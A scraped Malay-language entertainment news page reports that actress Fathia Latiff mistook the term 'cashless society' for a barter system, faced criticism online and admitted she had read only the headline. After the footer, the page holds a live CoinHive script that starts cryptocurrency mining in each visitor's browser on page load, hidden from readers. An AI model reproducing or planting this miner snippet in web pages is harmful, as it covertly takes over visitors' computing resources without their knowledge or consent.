© Copyright 2017, All Rights Reserved
Home / Hiburan / Cashless Nak tulis tajuk biar terang – Fathia Latiff

Cashless Nak tulis tajuk biar terang – Fathia Latiff


NAMA pelakon Fathia Latiff sekali lagi menjadi sebutan pengguna laman sosial.

Kali ini, gara-gara ‘kelurusannya’ mentafsirkan istilah cashless atau tanpa wang.

Fathia semalam memuat naik satu status ke akaun Twitter mengulas kenyataan yang dibuat Menteri Belia dan Sukan, Khairy Jamaluddin Abu Bakar tentang aspirasi cashless society untuk negara.

Cashless society merujuk kepada sistem jual beli tanpa menggunakan wang dan peningkatan penggunaan kad debit sebagai gantinya.

Namun Fathia tersilap tafsir istilah berkenaan dan beranggapan ia membawa maksud sistem barter, atau sistem tukaran barang, yang diamalkan masyarakat zaman dahulu kala.

Ia menerima kecaman netizen yang berpendapat Fathia sepatutnya membaca isi kandungan berita berkenaan dan memahaminya terlebih dahulu.

Apatah lagi sebagai selebriti, setiap gerak geri, perlakuan dan status di laman sosial akan menjadi perhatian.

Dalam kemas kini status terbaharunya, Fathia mengakui kesilapannya yang membuat kesimpulan hanya dengan membaca tajuk berita.


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Idayu juara AF Megastar 2017

SHAH ALAM: Idayu dinobatkan sebagai Juara AF Megastar sekali gus meraih wang ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();